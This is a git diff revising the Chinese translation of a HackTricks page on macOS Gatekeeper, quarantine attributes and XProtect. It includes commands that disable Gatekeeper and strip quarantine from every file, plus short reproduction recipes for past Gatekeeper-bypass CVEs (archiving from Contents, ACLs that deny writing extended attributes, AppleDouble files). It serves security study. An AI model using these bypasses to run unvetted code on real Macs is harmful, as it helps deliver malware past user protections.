* 发现[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上**关注我们。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

200
macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md
View file

@ -2,13 +2,13 @@
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* 你在**网络安全公司**工作吗?想要看到你的**公司在HackTricks中做广告**吗?或者想要访问**PEASS的最新版本或下载PDF格式的HackTricks**吗?查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[NFT收藏品](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) **Discord群**](https://discord.gg/hRep4RUj7f) 或 **电报群** 或在**Twitter**上关注我 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向** [**hacktricks仓库**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud仓库**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧**
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud)
</details>
@ -18,29 +18,29 @@
## Gatekeeper
**Gatekeeper**是为Mac操作系统开发的安全功能旨在确保用户在其系统上**仅运行可信软件**。它通过**验证用户从**App Store**之外的来源下载并尝试打开的软件**(如应用程序、插件或安装程序包)来发挥作用
**Gatekeeper** 是为 Mac 操作系统开发的安全功能,旨在确保用户 **仅运行受信任的软件**。它通过 **验证用户下载并尝试从 App Store 以外的来源打开的软件**(如应用程序、插件或安装包)来实现
Gatekeeper的关键机制在于其**验证**过程。它检查下载的软件是否**由已知开发人员签名**,确保软件的真实性。此外,它还确定软件是否**被苹果公证**,以确认其不包含已知恶意内容并且在公证后未被篡改。
Gatekeeper 的关键机制在于其 **验证** 过程。它检查下载的软件是否 **由认可的开发者签名**,以确保软件的真实性。此外,它还确认该软件是否 **经过 Apple 的公证**,以确保其不含已知的恶意内容,并且在公证后未被篡改。
此外Gatekeeper通过**提示用户批准首次打开**下载软件来加强用户控制和安全性。这种保护措施有助于防止用户无意中运行可能被误认为是无害数据文件的潜在有害可执行代码
此外Gatekeeper 通过 **提示用户首次批准打开下载的软件** 来增强用户控制和安全性。此保护措施有助于防止用户无意中运行可能有害的可执行代码,而将其误认为无害的数据文件
### 应用程序签名
### Application Signatures
应用程序签名,也称为代码签名,是Apple安全基础设施的关键组成部分。它用于**验证软件作者的身份**(开发人员)并确保代码自上次签名以来未被篡改。
应用程序签名,也称为代码签名,是 Apple 安全基础设施的关键组成部分。它们用于 **验证软件作者的身份**(开发者),并确保代码自上次签名以来未被篡改。
工作原理如下:
工作原理如下:
1. **签署应用程序:**当开发人员准备分发他们的应用程序时,他们会使用**私钥对应用程序进行签名**。此私钥与开发人员在加入Apple开发人员计划时获得的**证书相关联**。签名过程涉及创建应用程序所有部分的加密哈希,并使用开发人员的私钥对此哈希进行加密。
2. **分发应用程序:**签名的应用程序随后与开发人员的证书一起分发给用户,该证书包含相应的公钥。
3. **验证应用程序:**当用户下载并尝试运行应用程序时他们的Mac操作系统使用开发人员证书中的公钥来解密哈希。然后它根据应用程序的当前状态重新计算哈希并将其与解密的哈希进行比较。如果它们匹配这意味着**应用程序自开发人员签名以来未被修改**,系统允许应用程序运行。
1. **签名应用程序:** 当开发者准备分发其应用程序时,他们 **使用私钥签名应用程序**。此私钥与 **Apple 在开发者注册 Apple Developer Program 时向开发者颁发的证书** 相关联。签名过程涉及创建应用程序所有部分的加密哈希,并使用开发者的私钥对该哈希进行加密。
2. **分发应用程序:** 签名的应用程序随后与开发者的证书一起分发,该证书包含相应的公钥。
3. **验证应用程序:** 当用户下载并尝试运行该应用程序时,他们的 Mac 操作系统使用开发者证书中的公钥解密哈希。然后,它根据应用程序的当前状态重新计算哈希,并将其与解密后的哈希进行比较。如果它们匹配,则意味着 **自开发者签名以来,应用程序未被修改**,系统允许该应用程序运行。
应用程序签名是Apple Gatekeeper技术的重要组成部分。当用户尝试**打开从互联网下载的应用程序**时Gatekeeper会验证应用程序签名。如果它使用由苹果颁发给已知开发人员的证书签名且代码未被篡改则Gatekeeper允许应用程序运行。否则它会阻止应用程序并警告用户。
应用程序签名是 Apple Gatekeeper 技术的重要组成部分。当用户尝试 **打开从互联网下载的应用程序**Gatekeeper 会验证应用程序签名。如果它是由 Apple 向已知开发者颁发的证书签名并且代码未被篡改Gatekeeper 允许该应用程序运行。否则,它会阻止该应用程序并提醒用户。
macOS Catalina开始**Gatekeeper还会检查应用程序是否已被苹果公证**增加了额外的安全层。公证过程会检查应用程序是否存在已知的安全问题和恶意代码如果这些检查通过苹果会向应用程序添加Gatekeeper可以验证的凭证
macOS Catalina 开始,**Gatekeeper 还检查应用程序是否经过 Apple 的公证**增加了一层额外的安全性。公证过程检查应用程序是否存在已知的安全问题和恶意代码如果这些检查通过Apple 会向应用程序添加一个 Gatekeeper 可以验证的票据
#### 检查签名
#### Check Signatures
在检查一些**恶意软件样本**时,您应始终**检查二进制文件的签名**,因为签署它的**开发人员**可能已与**恶意软件**有关
在检查某些 **恶意软件样本** 时,您应始终 **检查二进制文件的签名**,因为 **签名** 的开发者可能已经 **与恶意软件相关**
```bash
# Get signer
codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier"
@ -57,32 +57,32 @@ spctl --assess --verbose /Applications/Safari.app
# Sign a binary
codesign -s <cert-name-keychain> toolsdemo
```
### 验证
### Notarization
苹果的验证流程作为一项额外的保障措施,旨在保护用户免受潜在有害软件的侵害。这涉及**开发人员提交其应用以供苹果的验证服务检查**,这与应用审核不应混淆。这项服务是一个**自动化系统**,会审查提交的软件是否存在**恶意内容**以及代码签名是否存在任何潜在问题。
苹果的 notarization 过程作为额外的保护措施,旨在保护用户免受潜在有害软件的影响。它涉及 **开发者提交他们的应用程序进行审查**,由 **苹果的 Notary Service** 进行,这与应用审核不应混淆。该服务是一个 **自动化系统**,对提交的软件进行审查,以检查是否存在 **恶意内容** 和任何潜在的代码签名问题。
如果软件**通过**此检查而没有引起任何疑虑,验证服务将生成一个验证票证。然后开发人员需要**将此票证附加到其软件**上,这个过程称为“装订”。此外,验证票证也会在线发布Gatekeeper苹果的安全技术可以访问它。
如果软件 **通过** 了这次检查而没有引发任何问题Notary Service 会生成一个 notarization 票据。开发者随后需要 **将此票据附加到他们的软件上**这个过程称为“stapling”。此外notarization 票据也会在线发布Gatekeeper苹果的安全技术可以访问它。
在用户首次安装或执行软件时,验证票证的存在 - 无论是装订到可执行文件上还是在线找到 - **通知 Gatekeeper 软件已由苹果进行验证**。因此Gatekeeper 在初始启动对话框中显示一个描述性消息,指示该软件已经通过苹果的恶意内容检查。这个过程增强了用户对其系统上安装或运行的软件安全性的信心。
在用户首次安装或执行软件时,notarization 票据的存在 - 无论是附加在可执行文件上还是在线找到 - **通知 Gatekeeper 该软件已由苹果进行 notarization**。因此Gatekeeper 在初始启动对话框中显示一条描述性消息,指示该软件已通过苹果的恶意内容检查。这个过程增强了用户对他们在系统上安装或运行的软件安全性的信心。
### 枚举 Gatekeeper
### Enumerating GateKeeper
Gatekeeper 既是**几个安全组件**,用于阻止不受信任的应用程序执行,也是**其中一个组件**
GateKeeper 是 **几个安全组件**,防止不受信任的应用程序被执行,同时也是 **其中一个组件**
可以使用以下命令查看 Gatekeeper 的**状态**
可以使用以下命令查看 GateKeeper 的 **状态**
```bash
# Check the status
spctl --status
```
{% hint style="danger" %}
请注意GateKeeper 签名检查仅针对具有**Quarantine 属性的文件**执行,而不是针对每个文件执行
注意GateKeeper 签名检查仅对 **具有隔离属性的文件** 进行,而不是对每个文件进行检查
{% endhint %}
GateKeeper 将检查二进制文件是否可以执行,根据**偏好设置和签名**
GateKeeper 将根据 **首选项和签名** 检查二进制文件是否可以执行:
<figure><img src="../../../.gitbook/assets/image (1150).png" alt=""><figcaption></figcaption></figure>
保存此配置的数据库位于**`/var/db/SystemPolicy`**。您可以以 root 身份检查此数据库:
保存此配置的数据库位于 **`/var/db/SystemPolicy`**。您可以使用 root 权限检查此数据库:
```bash
# Open database
sqlite3 /var/db/SystemPolicy
@ -96,10 +96,10 @@ anchor apple generic and certificate leaf[field.1.2.840.113635.100.6.1.9] exists
anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] exists and (certificate leaf[field.1.2.840.113635.100.6.1.14] or certificate leaf[field.1.2.840.113635.100.6.1.13]) and notarized|1|0|Notarized Developer ID
[...]
```
注意第一个规则以“**App Store**”结束,第二个规则以“**Developer ID**”结束,并且在之前的图像中它被**启用以执行来自App Store和已识别开发者的应用程序**。\
如果您将该设置修改为App Store那么“**已经过公证的开发者ID**”规则将消失。
注意第一个规则以“**App Store**”结束,第二个规则以“**Developer ID**”结束,并且在之前的图像中,它是**启用从 App Store 和已识别开发者执行应用程序**。\
如果您**修改**该设置为 App Store“**Notarized Developer ID**”规则将会消失。
还有成千上万个**类型为GKE**的规则:
还有成千上万的**类型 GKE** 的规则:
```bash
SELECT requirement,allow,disabled,label from authority where label = 'GKE' limit 5;
cdhash H"b40281d347dc574ae0850682f0fd1173aa2d0a39"|1|0|GKE
@ -108,13 +108,13 @@ cdhash H"4317047eefac8125ce4d44cab0eb7b1dff29d19a"|1|0|GKE
cdhash H"0a71962e7a32f0c2b41ddb1fb8403f3420e1d861"|1|0|GKE
cdhash H"8d0d90ff23c3071211646c4c9c607cdb601cb18f"|1|0|GKE
```
这些哈希值来自于 **`/var/db/SystemPolicyConfiguration/gke.bundle/Contents/Resources/gke.auth`, `/var/db/gke.bundle/Contents/Resources/gk.db`** 和 **`/var/db/gkopaque.bundle/Contents/Resources/gkopaque.db`**
这些是来自 **`/var/db/SystemPolicyConfiguration/gke.bundle/Contents/Resources/gke.auth``/var/db/gke.bundle/Contents/Resources/gk.db`** 和 **`/var/db/gkopaque.bundle/Contents/Resources/gkopaque.db`** 的哈希值。
或者你可以列出前面提到的信息:
或者你可以用以下方式列出前的信息:
```bash
sudo spctl --list
```
**`spctl`** 的选项 **`--master-disable`** 和 **`--global-disable`** 将完全**禁用**这些签名检查:
选项 **`--master-disable`** 和 **`--global-disable`** **`spctl`** 将完全 **禁用** 这些签名检查:
```bash
# Disable GateKeeper
spctl --global-disable
@ -128,11 +128,11 @@ spctl --master-enable
<figure><img src="../../../.gitbook/assets/image (1151).png" alt=""><figcaption></figcaption></figure>
可以使用以下方法**检查应用程序是否会被 GateKeeper 允许**
可以通过以下方式**检查一个应用是否会被GateKeeper允许**
```bash
spctl --assess -v /Applications/App.app
```
可以通过以下方式向 GateKeeper 添加新规则,允许执行特定应用程序
可以在 GateKeeper 中添加新规则,以允许某些应用程序的执行
```bash
# Check if allowed - nop
spctl --assess -v /Applications/App.app
@ -149,27 +149,27 @@ spctl --assess -v /Applications/App.app
```
### 隔离文件
下载应用程序或文件时,特定的 macOS 应用程序,如 Web 浏览器或电子邮件客户端会向下载的文件附加一个称为“隔离标志”quarantine flag的扩展文件属性。该属性作为一项安全措施将文件标记为来自不受信任的来源(互联网),并可能带风险。然而,并非所有应用程序都会附加此属性,例如,常见的 BitTorrent 客户端软件通常会绕过此过程。
**下载**应用程序或文件时特定的macOS **应用程序**(如网页浏览器或电子邮件客户端)会**附加一个扩展文件属性**,通常称为“**隔离标志**”,到下载的文件上。此属性作为安全措施,**标记文件**来自不受信任的来源(互联网),并可能带风险。然而并非所有应用程序都会附加此属性例如常见的BitTorrent客户端软件通常会绕过此过程。
**隔离标志的存在**在用户尝试执行文件时会触发 macOS 的 Gatekeeper 安全功能
**隔离标志的存在在用户尝试执行文件时向macOS的Gatekeeper安全功能发出信号**
在**隔离标志不存在的情况下**(例如通过某些 BitTorrent 客户端下载的文件Gatekeeper 的**检查可能不会执行**。因此,用户在打开从不太安全或未知来源下载的文件时应谨慎。
在**隔离标志不存在**的情况下例如通过某些BitTorrent客户端下载的文件Gatekeeper的**检查可能不会执行**。因此,用户在打开来自不太安全或未知来源的文件时应保持谨慎。
{% hint style="info" %}
**验证**代码签名的**有效性**是一个**资源密集型**的过程,包括生成代码及其所有捆绑资源的加密哈希。此外,检查证书的有效性涉及在线检查苹果服务器,以查看证书是否在签发后被吊销。出于这些原因,每次启动应用程序时运行完整的代码签名和公证检查是**不切实际**的
**检查**代码签名的**有效性**是一个**资源密集型**的过程,包括生成代码及其所有捆绑资源的加密**哈希**。此外,检查证书有效性还涉及对苹果服务器进行**在线检查**,以查看其在发放后是否被撤销。因此,完整的代码签名和公证检查在每次启动应用程序时**不切实际**
因此,这些检查**仅在执行带有隔离属性的应用程序时运行**。
因此,这些检查**仅在执行具有隔离属性的应用程序时运行。**
{% endhint %}
{% hint style="warning" %}
此属性必须由**创建/下载文件的应用程序设置**。
此属性必须由**创建/下载**文件的应用程序**设置**。
但是,受沙盒限制的文件将使每个它们创建的文件都设置此属性。非沙盒应用程序可以自行设置,或在 **Info.plist** 中指定 [**LSFileQuarantineEnabled**](https://developer.apple.com/documentation/bundleresources/information\_property\_list/lsfilequarantineenabled?language=objc) 键,系统将在创建的文件上设置 `com.apple.quarantine` 扩展属性。
然而,被沙盒化的文件将对它们创建的每个文件设置此属性。而非沙盒化的应用程序可以自行设置,或在**Info.plist**中指定[**LSFileQuarantineEnabled**](https://developer.apple.com/documentation/bundleresources/information_property_list/lsfilequarantineenabled?language=objc)键,这将使系统在创建的文件上设置`com.apple.quarantine`扩展属性,
{% endhint %}
此外,由调用 **`qtn_proc_apply_to_self`** 的进程创建的所有文件都会被隔离。或者使用 API **`qtn_file_apply_to_path`** 可将隔离属性添加到指定文件路径上
此外,所有调用**`qtn_proc_apply_to_self`**的进程创建的文件都是隔离的。或者API **`qtn_file_apply_to_path`**将隔离属性添加到指定的文件路径
可以通过以下方式**检查其状态并启用/禁用**(需要 root 权限):
可以使用以下命令**检查其状态并启用/禁用**需要root权限):
```bash
spctl --status
assessments enabled
@ -178,13 +178,13 @@ spctl --enable
spctl --disable
#You can also allow nee identifies to execute code using the binary "spctl"
```
您还可以使用以下方法**查找文件是否具有隔离扩展属性**
您还可以通过以下方式**查找文件是否具有隔离扩展属性**
```bash
xattr file.png
com.apple.macl
com.apple.quarantine
```
检查**扩展** **属性**的**值**,找出写入隔离属性的应用程序:
检查**扩展** **属性**的**值**找出写入隔离属性的应用程序:
```bash
xattr -l portada.png
com.apple.macl:
@ -200,7 +200,7 @@ com.apple.quarantine: 00C1;607842eb;Brave;F643CD5F-6071-46AB-83AB-390BA944DEC5
# Brave -- App
# F643CD5F-6071-46AB-83AB-390BA944DEC5 -- UID assigned to the file downloaded
```
实际上一个进程"可以为它创建的文件设置隔离标志"我尝试在创建的文件中应用USER\_APPROVED标志,但它不会应用):
实际上,一个进程“可以为它创建的文件设置隔离标志”(我尝试在创建的文件中应用 USER_APPROVED 标志,但它不会应用):
<details>
@ -266,13 +266,13 @@ return 0;
```
</details>
然后使用以下命令**删除**该属性:
并**移除**该属性:
```bash
xattr -d com.apple.quarantine portada.png
#You can also remove this attribute from every file with
find . -iname '*' -print0 | xargs -0 xattr -d com.apple.quarantine
```
使用以下命令查找所有被隔离的文件:
并找所有被隔离的文件:
{% code overflow="wrap" %}
```bash
@ -280,21 +280,21 @@ find / -exec ls -ld {} \; 2>/dev/null | grep -E "[x\-]@ " | awk '{printf $9; pri
```
{% endcode %}
隔离信息也存储在由LaunchServices管理的中央数据库中位于 **`~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2`**。
隔离信息也存储在由 LaunchServices 管理的中央数据库中,路径为 **`~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2`**。
#### **Quarantine.kext**
内核扩展仅通过系统上的内核缓存可用;但是,您可以从 https://developer.apple.com/ 下载 **Kernel Debug Kit**,其中包含扩展的符号化版本。
内核扩展仅通过 **系统上的内核缓存** 可用;但是,您 _可以_**https://developer.apple.com/** 下载 **内核调试工具包**,其中将包含该扩展的符号化版本。
### XProtect
XProtect 是 macOS 中内置的 **反恶意软件** 功能。XProtect 会对任何应用程序在首次启动或修改时与其已知恶意软件和不安全文件类型的数据库进行检查。当您通过某些应用程序(如 Safari、Mail 或 Messages下载文件时XProtect 会自动扫描该文件。如果文件与其数据库中的任何已知恶意软件匹配XProtect 将 **阻止文件运行** 并向您发出威胁警报
XProtect 是 macOS 中内置的 **反恶意软件** 功能。XProtect **在应用程序首次启动或修改时检查其数据库** 中已知的恶意软件和不安全文件类型。当您通过某些应用程序(如 Safari、Mail 或 Messages下载文件时XProtect 会自动扫描该文件。如果它与数据库中的任何已知恶意软件匹配XProtect 将 **阻止该文件运行** 并提醒您存在威胁
XProtect 数据库由 Apple 定期更新新的恶意软件定义,这些更新会自动下载并安装到您的 Mac 上。这确保了 XProtect 始终与最新已知威胁保持同步。
XProtect 数据库由 Apple **定期更新** 新的恶意软件定义,这些更新会自动下载并安装到您的 Mac 上。这确保了 XProtect 始终与最新已知威胁保持同步。
然而,值得注意的是 **XProtect 不是完整的防病毒解决方案**。它仅检查特定已知威胁列表,不像大多数防病毒软件那样执行访问扫描。
然而,值得注意的是 **XProtect 不是一个功能齐全的杀毒解决方案**。它仅检查特定已知威胁列表,并不像大多数杀毒软件那样执行按需扫描。
您可以获取有关最新 XProtect 更新的信息运行
您可以通过运行以下命令获取有关最新 XProtect 更新的信息:
{% code overflow="wrap" %}
```bash
@ -302,73 +302,75 @@ system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistC
```
{% endcode %}
XProtect位于SIP受保护位置**/Library/Apple/System/Library/CoreServices/XProtect.bundle**在bundle内部您可以找到XProtect使用的信息:
XProtect 位于 SIP 保护位置 **/Library/Apple/System/Library/CoreServices/XProtect.bundle**,在该包内可以找到 XProtect 使用的信息:
- **`XProtect.bundle/Contents/Resources/LegacyEntitlementAllowlist.plist`**:允许具有这些cdhashes的代码使用传统授权
- **`XProtect.bundle/Contents/Resources/XProtect.meta.plist`**禁止通过BundleID和TeamID加载的插件和扩展列表,或指示最低版本。
- **`XProtect.bundle/Contents/Resources/XProtect.yara`**用于检测恶意软件的Yara规则。
- **`XProtect.bundle/Contents/Resources/gk.db`**带有已阻止应用程序和TeamIDs哈希的SQLite3数据库。
* **`XProtect.bundle/Contents/Resources/LegacyEntitlementAllowlist.plist`**:允许具有这些 cdhash 的代码使用遗留权限
* **`XProtect.bundle/Contents/Resources/XProtect.meta.plist`**:不允许通过 BundleID 和 TeamID 加载的插件和扩展的列表,或指示最低版本。
* **`XProtect.bundle/Contents/Resources/XProtect.yara`**:检测恶意软件的 Yara 规则。
* **`XProtect.bundle/Contents/Resources/gk.db`**:包含被阻止应用程序和 TeamIDs 哈希的 SQLite3 数据库。
请注意,还有另一个与XProtect相关的App位于**`/Library/Apple/System/Library/CoreServices/XProtect.app`**与Gatekeeper进程无关。
请注意,**`/Library/Apple/System/Library/CoreServices/XProtect.app`** 中还有另一个与 XProtect 相关的应用程序,但它与 Gatekeeper 过程无关。
### Gatekeeper
### 不是 Gatekeeper
{% hint style="danger" %}
请注意Gatekeeper**不会每次**执行应用程序时都执行只有在您执行已由Gatekeeper执行和验证的应用程序时_**AppleMobileFileIntegrity**_AMFI才会**验证可执行代码签名**
请注意Gatekeeper **并不是每次** 执行应用程序时都会被执行,只有 _**AppleMobileFileIntegrity**_ (AMFI) 会在执行已经由 Gatekeeper 执行和验证的应用程序时 **验证可执行代码签名**
{% endhint %}
因此,以前可以执行一个应用程序以使用Gatekeeper缓存它然后**修改应用程序的非可执行文件**如Electron asar或NIB文件如果没有其他保护措施该应用程序将带有**恶意**添加内容
因此,之前可以执行一个应用程序以缓存它与 Gatekeeper然后 **修改应用程序的非可执行文件**(如 Electron asar 或 NIB 文件),如果没有其他保护措施,应用程序将 **执行** 带有 **恶意** 附加内容的版本
然而,现在这是不可能的因为macOS**阻止修改**应用程序包内的文件。因此,如果尝试[Dirty NIB](../macos-proces-abuse/macos-dirty-nib.md)攻击您将发现不再可能滥用它因为在执行应用程序以使用Gatekeeper缓存它后您将无法修改bundle。例如如果更改Contents目录的名称为NotCon如在漏洞利用中指示的那样然后执行应用程序的主二进制文件以使用Gatekeeper缓存它将触发错误并且不会执行。
然而,现在这已不再可能,因为 macOS **防止修改** 应用程序包内的文件。因此,如果您尝试 [Dirty NIB](../macos-proces-abuse/macos-dirty-nib.md) 攻击,您会发现不再可能利用它,因为在执行应用程序以缓存它与 Gatekeeper 后,您将无法修改该包。如果您例如将 Contents 目录的名称更改为 NotCon如漏洞中所示然后执行应用程序的主二进制文件以缓存它与 Gatekeeper将触发错误并且不会执行。
## Gatekeeper绕过
## Gatekeeper 绕过
任何绕过Gatekeeper的方法成功让用户下载并在Gatekeeper应该禁止时执行都被视为macOS中的漏洞。以下是一些过去允许绕过Gatekeeper的技术分配的CVE
任何绕过 Gatekeeper 的方法(设法让用户下载某些内容并在 Gatekeeper 应该禁止时执行它)都被视为 macOS 中的漏洞。这些是一些分配给允许在过去绕过 Gatekeeper 的技术的 CVE
### [CVE-2021-1810](https://labs.withsecure.com/publications/the-discovery-of-cve-2021-1810)
观察到,如果使用**Archive Utility**进行提取路径超过886个字符的文件将不会收到com.apple.quarantine扩展属性。这种情况无意中允许这些文件**绕过Gatekeeper**的安全检查。
观察到如果使用 **Archive Utility** 进行提取,路径超过 **886 个字符** 的文件不会接收 com.apple.quarantine 扩展属性。这种情况无意中允许这些文件 **绕过 Gatekeeper 的** 安全检查。
查看[**原始报告**](https://labs.withsecure.com/publications/the-discovery-of-cve-2021-1810)获取更多信息。
查看 [**原始报告**](https://labs.withsecure.com/publications/the-discovery-of-cve-2021-1810)获取更多信息。
### [CVE-2021-30990](https://ronmasas.com/posts/bypass-macos-gatekeeper)
当使用**Automator**创建应用程序时,关于其需要执行的信息位于`application.app/Contents/document.wflow`中,而不在可执行文件中。可执行文件只是一个名为**Automator Application Stub**的通用Automator二进制文件。
当使用 **Automator** 创建应用程序时,关于其执行所需的信息位于 `application.app/Contents/document.wflow` 中,而不在可执行文件中。可执行文件只是一个名为 **Automator Application Stub** 的通用 Automator 二进制文件。
因此,您可以使`application.app/Contents/MacOS/Automator\ Application\ Stub`**指向系统内另一个Automator Application Stub的符号链接**,它将执行`document.wflow`中的内容(您的脚本)**而不触发Gatekeeper**因为实际可执行文件没有quarantine xattr。
因此,您可以使 `application.app/Contents/MacOS/Automator\ Application\ Stub` **通过符号链接指向系统内的另一个 Automator Application Stub**,它将执行 `document.wflow` 中的内容(您的脚本) **而不会触发 Gatekeeper**,因为实际的可执行文件没有隔离 xattr。
预期位置示例`/System/Library/CoreServices/Automator\ Application\ Stub.app/Contents/MacOS/Automator\ Application\ Stub`
示例预期位置:`/System/Library/CoreServices/Automator\ Application\ Stub.app/Contents/MacOS/Automator\ Application\ Stub`
查看[**原始报告**](https://ronmasas.com/posts/bypass-macos-gatekeeper)获取更多信息。
查看 [**原始报告**](https://ronmasas.com/posts/bypass-macos-gatekeeper)获取更多信息。
### [CVE-2022-22616](https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/)
在此绕过中,创建了一个zip文件从`application.app/Contents`开始压缩,而不是从`application.app`开始。因此,**quarantine attr**被应用于**来自`application.app/Contents`的所有文件**,但未应用于`application.app`Gatekeeper正在检查的文件因此Gatekeeper被绕过因为当触发`application.app`时,**它没有quarantine属性**。
在此绕过中,创建了一个 zip 文件,应用程序从 `application.app/Contents` 开始压缩,而不是从 `application.app`。因此,**隔离属性** 应用于所有 **来自 `application.app/Contents` 的文件**,但 **不适用于 `application.app`**,这是 Gatekeeper 检查的内容,因此 Gatekeeper 被绕过,因为当触发 `application.app` 时 **没有隔离属性。**
```bash
zip -r test.app/Contents test.zip
```
[**原始报告**](https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/)以获取更多信息。
查[**原始报告**](https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/)以获取更多信息。
### [CVE-2022-32910](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32910)
即使组件不同,利用此漏洞的过程与先前的非常相似。在这种情况下,我们将从**`application.app/Contents`**生成一个苹果存档,这样当通过**Archive Utility**解压缩时,**`application.app`将不会获得隔离属性**。
即使组件不同,此漏洞的利用与之前的非常相似。在这种情况下,将从 **`application.app/Contents`** 生成一个 Apple Archive因此 **`application.app` 在通过 **Archive Utility** 解压缩时不会获得隔离属性**。
```bash
aa archive -d test.app/Contents -o test.app.aar
```
[**原始报告**](https://www.jamf.com/blog/jamf-threat-labs-macos-archive-utility-vulnerability/)以获取更多信息。
查[**原始报告**](https://www.jamf.com/blog/jamf-threat-labs-macos-archive-utility-vulnerability/)以获取更多信息。
### [CVE-2022-42821](https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/)
ACL **`writeextattr`** 可用于防止任何人文件中写入属性:
ACL **`writeextattr`** 可用于防止任何人文件中写入属性:
```bash
touch /tmp/no-attr
chmod +a "everyone deny writeextattr" /tmp/no-attr
xattr -w attrname vale /tmp/no-attr
xattr: [Errno 13] Permission denied: '/tmp/no-attr'
```
此外,**AppleDouble** 文件格式会复制一个文件包括其ACEs
此外,**AppleDouble** 文件格式复制了一个文件及其 ACE
在[**源代码**](https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html)中,可以看到存储在名为**`com.apple.acl.text`**的xattr中的ACL文本表示将被设置为解压后文件的ACL。因此如果您使用**AppleDouble**文件格式将应用程序压缩到zip文件中并附带一个ACL防止其他xattr被写入它...隔离xattr 将不会被设置到应用程序中:
在 [**源代码**](https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html) 中可以看到,存储在名为 **`com.apple.acl.text`** 的 xattr 中的 ACL 文本表示将被设置为解压缩文件中的 ACL。因此如果您将一个应用程序压缩成一个带有 ACL 的 **AppleDouble** 文件格式的 zip 文件,该 ACL 阻止其他 xattrs 被写入... 那么隔离 xattr 并没有被设置到该应用程序中:
{% code overflow="wrap" %}
```bash
chmod +a "everyone deny write,writeattr,writeextattr" /tmp/test
ditto -c -k test test.zip
@ -379,7 +381,7 @@ python3 -m http.server
查看[**原始报告**](https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/)以获取更多信息。
请注意,这也可以利用AppleArchives:
请注意,这也可以通过AppleArchives进行利用
```bash
mkdir app
touch app/test
@ -388,11 +390,13 @@ aa archive -d app -o test.aar
```
### [CVE-2023-27943](https://blog.f-secure.com/discovery-of-gatekeeper-bypass-cve-2023-27943/)
发现**Google Chrome没有设置下载文件的隔离属性**,因为一些 macOS 内部问题。
发现**Google Chrome没有为下载的文件设置隔离属性**这是由于一些macOS内部问题。
### [CVE-2023-27951](https://redcanary.com/blog/gatekeeper-bypass-vulnerabilities/)
AppleDouble 文件格式将文件属性存储在以 `._` 开头的单独文件中,这有助于在**macOS设备之间复制文件属性**。然而,注意到在解压 AppleDouble 文件后,以 `._` 开头的文件**没有被赋予隔离属性**。
AppleDouble文件格式将文件的属性存储在以`._`开头的单独文件中,这有助于在**macOS机器之间**复制文件属性。然而注意到在解压AppleDouble文件后以`._`开头的文件**没有被赋予隔离属性**。
{% code overflow="wrap" %}
```bash
mkdir test
echo a > test/a
@ -404,7 +408,8 @@ aa archive -d test/ -o test.aar
```
{% endcode %}
